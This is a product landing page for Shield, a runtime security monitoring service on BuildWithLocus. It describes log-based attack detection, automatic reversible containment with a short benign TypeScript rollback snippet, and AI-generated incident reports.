ShieldWith
Log inTry the demo
Now live·Runtime security monitoring on BuildWithLocus beta.Try the demo

Secure everything,
compromise nothing.

Runtime security for every service on BuildWithLocus — protecting you from attacks that exploit the gaps in your own code. Detect them live in the log stream, open AI-authored incident reports, and contain the blast radius automatically, through the deploy API you already use to ship.

Try the live demoHow it works

Runtime Detection

Pattern-matched log monitoring

Reversible Containment

Scale-to-zero, rollback, restart

AI Incident Reports

Automated post-mortems with remediation

01 · Detection

Read every log line.
Score in milliseconds.

Shield watches live log streams, matches against a curated indicator library, and opens incidents only when severity crosses a category threshold.

shield.live — Detection stream
Live incidents
Detection stream
live
CRITICAL
Malware payload fetch detected — scale-to-zero fired.
demo-target · 3:30 AM
HIGH
RCE probe frequency exceeded threshold.
demo-target · 3:29 AM
MEDIUM
SQL UNION injection signature in query error.
demo-target · 3:28 AM
LOW
Scanner probe volume on /.env, /.git/config.
demo-target · 3:27 AM
  • Observability
    Every matched line captured with timestamp, category, and IOC id.
  • Compiled once
    One composite alternation per category. Zero analyst cost on the hot path.
  • Sliding severity
    60-second windows with category-specific thresholds.
02 · Containment

Safety-first by construction.

Automated response is limited to reversible moves. Anything that destroys forensic state requires a human on the button.

response/contain.ts
// 1. Scale-to-zero — reversible, instant
await endpoints.scaleToZero(service.id);

// 2. Rollback if a healthy prior deploy exists
const { deployments } = await endpoints
  .listDeployments(service.id);
const prior = deployments.find(d => d.status === 'healthy');
if (prior) await endpoints.rollback(prior.id);

// 3. Audit every action — typed + traceable
await audit.write({
  incidentId,
  actionKind: 'scale_to_zero',
  actorKind: 'agent',
});
  • Scale-to-zero
    High-severity incidents park the container via the deploy API.
  • Reversible
    Rollback to the last healthy deploy when one exists. No data loss.
  • Human-gated
    Rebuild, rotation, teardown — all require explicit approval.
03 · Reporting

Post-mortems write themselves.

Every confirmed incident gets a structured report: classification, timeline, remediation checklist, and a suggested new indicator.

incidents/01h9m2 — Report
Incident report · generated 2s ago
Botnet RCE probe campaign
Classification
Mirai-family commodity botnet scanning for Log4Shell and shell injection. Likely pre-exploitation reconnaissance; no successful execution observed.
Attack type
rce_probe + malware_deploy
Confidence
High (9/10)
Immediate actions
  • Confirm scale-to-zero held — no outbound traffic on monitor.
  • Snapshot last 50 evidence lines for forensic review.
  • Rotate credentials present in matched stack traces.
  • Structured
    JSON output via schema validation. One call per incident.
  • Checklist
    Immediate, short-term, preventive. Copy as Markdown.
  • Learning library
    Each report suggests one new indicator. Approve to add it.
Complete coverage

Right signals. Right response.

Shield covers the full lifecycle — from runtime log detection to reversible containment to structured incident analysis — all on BuildWithLocus primitives.

01

Real-time detection

Pattern-matched at log-stream speed. Six attack categories in a curated library. Regex-first; no analyst cost on the hot path.

02

Reversible containment

Scale-to-zero fires automatically. Rollback when a healthy prior deploy exists. Destructive actions wait on human approval.

03

Automated reports

Analysis runs only on confirmed incidents. Structured output, bounded context. Every report suggests one new indicator to learn.

The shape of it

Measurable by design.

<0s
Detection window
0
Attack categories
0 LLM
Hot-path cost
0s
Containment fire
Watching forRCE probeMalware deploySecret exposureBrute forceSQL injectionScanner probe

Frequently asked
questions.

Ready to watch? Sign in to the live demo or start monitoring your own services.

Bring your claw_ key and Shield picks up every service in your workspace in under sixty seconds. No agent install, no sidecar, no kernel module.

Try the demoConnect your workspace
BuildWithLocus

Built on Locus primitives. Shield uses SSE log streams, instant rollback, and scale-to-zero — the same deploy API you can wire up in minutes.

Explore BuildWithLocus →